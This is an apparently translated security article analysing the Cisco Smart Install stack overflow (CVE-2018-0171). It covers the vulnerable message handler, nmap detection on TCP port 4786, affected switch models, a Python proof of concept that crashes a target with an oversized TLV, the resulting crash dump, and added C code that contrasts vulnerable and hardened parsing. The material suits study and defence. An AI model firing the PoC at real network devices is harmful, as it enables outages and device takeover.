2025-03-28 update. From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 05/31 report
How do you analyze the remote code execution vulnerability in Cisco Smart Install? This article walks through the analysis in detail, in the hope that it gives readers facing the same question a simpler way in.
I. Brief introduction
System: Cisco IOS, Cisco IOS XE
Vendor: Cisco
Vulnerability: stack-based buffer overflow (CVE-2018-0171) [CWE-20] [CWE-121]
Severity: high; CVSS v2 vector AV:N/AC:L/Au:N/C:C/I:C/A:C (base score 10.0)
The researchers found a stack buffer overflow in the Smart Install client code. An attacker can exploit it to execute arbitrary code remotely without authentication, which means the attacker can take full control of any affected network device.
Smart Install is a plug-and-play configuration and image-management feature for deploying switches. It automatically initializes a new switch and loads the current operating-system image onto it, so a switch can be shipped to a remote site, plugged into the network and brought up without on-site configuration or an administrator. The feature also backs up the configuration whenever it changes and lets a damaged device be swapped out for a replacement.
A network that uses Smart Install consists of a group of network devices called clients, served by a layer 3 switch or router that acts as their director.
The director provides a single point of management for the images and configurations of the client switches. A client switch is connected to the director directly or indirectly and receives its image and configuration downloads from it.
You can learn more about Smart Install technology through the official documentation.
It is worth noting that the Smart Install client is enabled by default, so the reach and impact of the vulnerability are self-evident; this is discussed further below.
II. Vulnerability description
The SMI IBC Server Process contains the implementation of the Smart Install client. The client listens on TCP port 4786 (open by default) to talk to the Smart Install director.
A stack buffer overflow occurs when this service processes a specially crafted ibd_init_discovery_msg message.
More precisely, the overflow is in smi_ibc_handle_ibd_init_discovery_msg: the size of the data copied into a fixed-size buffer is never checked. Both the size and the data are taken straight from the network packet, so both are attacker-controlled.
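The two handler shapes described above, side by side, as an added example written for this article rather than Cisco's or Embedi's code. The TLV layout (4-byte big-endian type, 4-byte big-endian length, then the value) and the 36-byte filler are taken from the PoC later in this article; the buffer size DATA_BUF_LEN, the function names and the return codes are assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TLV_HDR_LEN   8u    /* 4-byte type + 4-byte length, big-endian, as in the PoC */
#define TLV_TYPE_DATA 1u    /* the TLV type the PoC sends (0x00000001) */
#define DATA_BUF_LEN  36u   /* hypothetical size of the fixed stack buffer */

static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}
static void put_be32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/* Mirror of the PoC's craft_tlv(): type, length, value. Returns the bytes
 * written, or 0 when the output buffer cannot hold the TLV. */
size_t craft_tlv(uint8_t *out, size_t cap, uint32_t type, const uint8_t *v, size_t vlen) {
    if (cap < TLV_HDR_LEN + vlen) return 0;
    put_be32(out, type);
    put_be32(out + 4, (uint32_t)vlen);
    memcpy(out + TLV_HDR_LEN, v, vlen);
    return TLV_HDR_LEN + vlen;
}

/* Vulnerable shape (never feed it an oversized TLV): the length field is read
 * from the packet and handed straight to memcpy. Anything above DATA_BUF_LEN
 * runs past the stack buffer into the saved registers and return address. */
int handle_discovery_vulnerable(const uint8_t *msg, size_t msg_len) {
    uint8_t data[DATA_BUF_LEN];
    if (msg_len < TLV_HDR_LEN || be32(msg) != TLV_TYPE_DATA) return -1;
    uint32_t len = be32(msg + 4);
    memcpy(data, msg + TLV_HDR_LEN, len);        /* no check against sizeof data */
    return (int)len;
}

/* Hardened shape: the length must be covered by the bytes actually received
 * and must fit the destination, and both checks run before any copy. */
int handle_discovery_hardened(const uint8_t *msg, size_t msg_len) {
    uint8_t data[DATA_BUF_LEN];
    if (msg_len < TLV_HDR_LEN || be32(msg) != TLV_TYPE_DATA) return -1;
    uint32_t len = be32(msg + 4);
    if (len > msg_len - TLV_HDR_LEN) return -2;  /* claims more than the packet carries */
    if (len > sizeof data) return -3;            /* would overflow the fixed buffer */
    memcpy(data, msg + TLV_HDR_LEN, len);
    return (int)len;
}

/* The data TLV from the PoC: 36 x 'A', a 4-byte length word, then 44 x 'BBBB'
 * (the 2048-byte 'D' block follows the TLV in the PoC and is omitted here). */
size_t build_poc_tlv(uint8_t *out, size_t cap) {
    uint8_t value[36 + 4 + 4 * 44];
    memset(value, 'A', 36);
    put_be32(value + 36, (uint32_t)(4 * 44 + 2048 + 40));
    memset(value + 40, 'B', 4 * 44);
    return craft_tlv(out, cap, TLV_TYPE_DATA, value, sizeof value);
}

/* A benign TLV whose value exactly fills the buffer. */
size_t build_benign_tlv(uint8_t *out, size_t cap) {
    uint8_t value[DATA_BUF_LEN];
    memset(value, 'A', sizeof value);
    return craft_tlv(out, cap, TLV_TYPE_DATA, value, sizeof value);
}

/* Verdict of the hardened handler on the PoC-shaped TLV (the vulnerable
 * handler is deliberately not called on it). */
int poc_tlv_verdict(void) {
    uint8_t pkt[512];
    size_t n = build_poc_tlv(pkt, sizeof pkt);
    return handle_discovery_hardened(pkt, n);
}

/* Both handlers on the benign TLV; -100 if they disagree. */
int benign_tlv_verdict(void) {
    uint8_t pkt[512];
    size_t n = build_benign_tlv(pkt, sizeof pkt);
    int v = handle_discovery_vulnerable(pkt, n), h = handle_discovery_hardened(pkt, n);
    return v == h ? h : -100;
}

int main(void) {
    printf("benign TLV:     both handlers return %d\n", benign_tlv_verdict());
    printf("PoC-shaped TLV: hardened handler returns %d (length field %u, buffer %u)\n",
           poc_tlv_verdict(), 36u + 4u + 4u * 44u, DATA_BUF_LEN);
    return 0;
}
```

Build with `cc -std=c99 -Wall -o smi_tlv smi_tlv.c`. The PoC-shaped TLV carries 216 bytes of value against a 36-byte buffer, so the hardened handler rejects it with -3 before anything is copied; the vulnerable handler would have written 180 bytes past the end of the buffer, which is the overwrite the crash dump at the end of this article shows.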
III. Award-winning entry at GeekPwn 2017 Hong Kong
George Nosenko, a white-hat hacker from the security company Embedi, demonstrated the vulnerability at the Hong Kong stop of the GeekPwn 2017 hacking contest and won the "Best Technology Award", worth a total of 250,000 yuan.
The contest scenario required contestants to complete the following two challenges on a Cisco Catalyst 2960 switch:
1. Reset or change the enable password to enter privileged EXEC mode:
https://v.qq.com/x/page/z0616f2f7q8.html
2. Hijack the network traffic between the switch and other devices:
https://v.qq.com/x/page/y0616rq52ca.html
More technical details and the exploit development are described in the article "How To Cook Cisco".
IV. Vulnerability detection
If a Cisco network device has TCP port 4786 open, the Smart Install client is exposed and the device may be affected. Such devices can be found by scanning:
nmap -p T:4786 192.168.1.0/24
To check whether a network device has the Smart Install client enabled, run the following commands on it:
switch> show vstack config
 Role: Client (SmartInstall enabled)
 Vstack Director IP address: 0.0.0.0

switch> show tcp brief all
TCB       Local Address      Foreign Address    (state)
0344B794  *.4786             *.*                LISTEN
0350A018  *.443              *.*                LISTEN
03293634  *.443              *.*                LISTEN
03292D9C  *.80               *.*                LISTEN
03292504  *.80               *.*                LISTEN
V. Internet scan results
When we found this vulnerability, we assumed it could only be used for attacks from inside a network, because a sensibly configured network would not expose Smart Install to the Internet.
After scanning the Internet, we found that this is not the case.
A short scan immediately turned up about 250,000 vulnerable devices and 8.5 million devices with the vulnerable port open.
The likely reason is that the Smart Install client port (TCP 4786) is open by default and network administrators are unaware of the security problem it creates.
VI. Affected software and hardware
Devices verified to be vulnerable include Catalyst 4500 Supervisor Engines, Cisco Catalyst 3850 Series switches and Cisco Catalyst 2960 Series switches:
Cisco Catalyst 4500 Supervisor Engine 6L-E
  Cisco IOS 15.2.2E6 (latest, suggested): cat4500e-entservicesk9-mz.152-2.E6.bin (23-DEC-2016)
Cisco Catalyst 2960-48TT-L Switch
  Cisco IOS 12.2(55)SE11 (suggested): c2960-lanbasek9-mz.122-55.SE11.bin (18-AUG-2016)
  Cisco IOS 15.0.2-SE10a (latest): c2960-lanbasek9-mz.150-2.SE10a.bin (10-NOV-2016)
Cisco Catalyst 3850-24P-E Switch
  Cisco IOS-XE 03.03.05.SE: cat3k_caa-universalk9.SPA.03.03.05.SE.150-1.EZ5.bin (03-NOV-2014)
In addition, every device that runs the Smart Install client may be affected, including the following:
Catalyst 4500 Supervisor Engines
Catalyst 3850 Series
Catalyst 3750 Series
Catalyst 3650 Series
Catalyst 3560 Series
Catalyst 2960 Series
Catalyst 2975 Series
IE 2000
IE 3000
IE 3010
IE 4000
IE 4010
IE 5000
SM-ES2 SKUs
SM-ES3 SKUs
NME-16ES-1G-P
SM-X-ES3 SKUs
For more information, see:
Cisco Security Advisory
Cisco Feature Navigator
Supported Devices for Smart Install
VII. PoC
#!/usr/bin/env python3
# smi_ibc_init_discovery_BoF.py
import socket
import struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1")
parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786)
(options, args) = parser.parse_args()


def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
    # type, length, value: 4-byte big-endian type and length, then the value bytes
    return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v


def send_packet(sock, packet):
    sock.send(packet)


def receive(sock):
    # the original called recv() with no buffer size, which is a TypeError
    return sock.recv(4096)


if __name__ == "__main__":
    print("[*] Connecting to Smart Install Client", options.target, "port", options.port)
    con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    con.connect((options.target, options.port))

    payload = b'BBBB' * 44      # 0x42424242: the value that ends up in the saved registers and PC
    shellcode = b'D' * 2048
    data = b'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload

    tlv_1 = craft_tlv(0x00000001, data)
    tlv_2 = shellcode

    # hdr is the Smart Install message header that precedes the TLVs; it is not
    # defined in the PoC as reproduced on this page and must be supplied before running.
    pkt = hdr + tlv_1 + tlv_2

    print("[*] Send a malicious packet")
    send_packet(con, pkt)
Attack command:
host$ ./smi_ibc_init_discovery_BoF.py -t 192.168.1.1
The switch should crash and reload:
0-Traceback= 42424240
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_15
=== Flushing messages (00:10:39 UTC Mon Mar 1 1993) ===
Buffered messages:
...
Queued messages:
Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2016 by Cisco Systems Inc.
Compiled Wed 17-Aug-16 13:46 by prod_rel_team
Instruction TLB Miss Exception (0x1200)!
SRR0 = 0x42424240 SRR1 = 0x00029230 SRR2 = 0x0152ACE4 SRR3 = 0x00029230
ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x84000000 DBSR = 0x00000000
CPU Register Context:
Vector = 0x42424240 MSR = 0x00029230 CR = 0x42424242 CTR = 0x014D5268
XER = 0xC000006A
R0 = 0x42424242 R1 = 0x02B1B0B0 R2 = 0x00000000 R3 = 0x032D12B4
R4 = 0x000000B6 R5 = 0x0000001E R6 = 0xAA3BEC00 R7 = 0x00000014
R8 = 0x0000001E R9 = 0x00000000 R10 = 0x001BA800 R11 = 0xFFFFFFFF
R12 = 0x00000000 R13 = 0x00110000 R14 = 0x0131E1A8 R15 = 0x02B1B1A8
R16 = 0x02B1B128 R17 = 0x02B1B128 R18 = 0x02B1B128 R19 = 0x00000000
R21 = 0x00000000 R22 = 0x02B1B128 R23 = 0x02B1B1A8
R24 = 0x00000001 R25 = 0x00000000 R26 = 0x42424242 R27 = 0x42424242
R28 = 0x42424242 R29 = 0x42424242 R30 = 0x42424242 R31 = 0x42424242
Stack trace:
PC = 0x42424240 SP = 0x02B1B0B0
Frame 00: SP = 0x42424242 PC = 0x42424242
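A first-pass triage of the register dump above, as an added example written for this article (not from the page's author or Embedi). It parses the "NAME = 0xVALUE" pairs from a constructed subset of the dump embedded in the code, lists the registers that were restored from the PoC's 'BBBB' filler, and checks that the faulting PC is that filler with its low two bits cleared, which is why the traceback reads 42424240 while the saved registers read 0x42424242. The function names are the example's own.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FILLER   0x42424242u   /* 'BBBB', the payload bytes the PoC sends */
#define MAX_REGS 64

/* Constructed excerpt of the register context printed in the crash above. */
static const char CRASH_DUMP[] =
    "Instruction TLB Miss Exception (0x1200)!\n"
    "SRR0 = 0x42424240 SRR1 = 0x00029230 SRR2 = 0x0152ACE4 SRR3 = 0x00029230\n"
    "Vector = 0x42424240 MSR = 0x00029230 CR = 0x42424242 CTR = 0x014D5268\n"
    "R0 = 0x42424242 R1 = 0x02B1B0B0 R2 = 0x00000000 R3 = 0x032D12B4\n"
    "R26 = 0x42424242 R27 = 0x42424242 R28 = 0x42424242 R29 = 0x42424242\n"
    "R30 = 0x42424242 R31 = 0x42424242\n"
    "PC = 0x42424240 SP = 0x02B1B0B0\n";

struct reg { char name[8]; uint32_t value; };

/* Pull every "NAME = 0xHEX" pair out of the dump; returns the number stored. */
int parse_regs(const char *dump, struct reg *out, int cap) {
    int n = 0;
    const char *p = dump;
    while (n < cap && (p = strstr(p, "= 0x")) != NULL) {
        const char *end = p;                         /* back up over the space... */
        while (end > dump && end[-1] == ' ') end--;
        const char *start = end;                     /* ...then over the name */
        while (start > dump && isalnum((unsigned char)start[-1])) start--;
        size_t len = (size_t)(end - start);
        if (len > 0 && len < sizeof out[n].name) {
            memcpy(out[n].name, start, len);
            out[n].name[len] = '\0';
            out[n].value = (uint32_t)strtoul(p + 2, NULL, 16);
            n++;
        }
        p += 4;
    }
    return n;
}

int find_reg(const struct reg *r, int n, const char *name, uint32_t *val) {
    for (int i = 0; i < n; i++)
        if (strcmp(r[i].name, name) == 0) { *val = r[i].value; return 1; }
    return 0;
}

/* How many registers in the dump were restored from the attacker's filler. */
int filler_reg_count(const char *dump, uint32_t filler) {
    struct reg regs[MAX_REGS];
    int n = parse_regs(dump, regs, MAX_REGS), c = 0;
    for (int i = 0; i < n; i++) if (regs[i].value == filler) c++;
    return c;
}

/* PowerPC branch targets are word-aligned: the two low bits of an address
 * loaded from the overwritten frame are dropped, so 0x42424242 faults as
 * 0x42424240, the value the traceback and SRR0 report. */
uint32_t aligned_pc(uint32_t v) { return v & ~3u; }

/* Triage verdict: 1 when the faulting PC (SRR0) equals the filler masked to
 * instruction alignment, i.e. execution resumed at an address taken from
 * the smashed stack frame. */
int pc_from_filler(const char *dump, uint32_t filler) {
    struct reg regs[MAX_REGS];
    int n = parse_regs(dump, regs, MAX_REGS);
    uint32_t srr0;
    return find_reg(regs, n, "SRR0", &srr0) && srr0 == aligned_pc(filler);
}

int main(void) {
    struct reg regs[MAX_REGS];
    int n = parse_regs(CRASH_DUMP, regs, MAX_REGS);
    printf("%d registers parsed, %d hold the filler 0x%08x:", n,
           filler_reg_count(CRASH_DUMP, FILLER), FILLER);
    for (int i = 0; i < n; i++)
        if (regs[i].value == FILLER) printf(" %s", regs[i].name);
    printf("\nPC taken from overflow data: %s\n",
           pc_from_filler(CRASH_DUMP, FILLER) ? "yes" : "no");
    return 0;
}
```

On the excerpt, CR, R0 and R26 through R31 all hold the filler: those are the callee-saved registers and the link register that the epilogue restored from the overwritten frame, and SRR0 is the filler masked to 4-byte alignment, so the overflow reached the return address and the attacker controls where execution resumes.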
This concludes the analysis of the remote code execution vulnerability in Cisco Smart Install. I hope the material above is of some help; if questions remain, follow the industry information channel for more related content.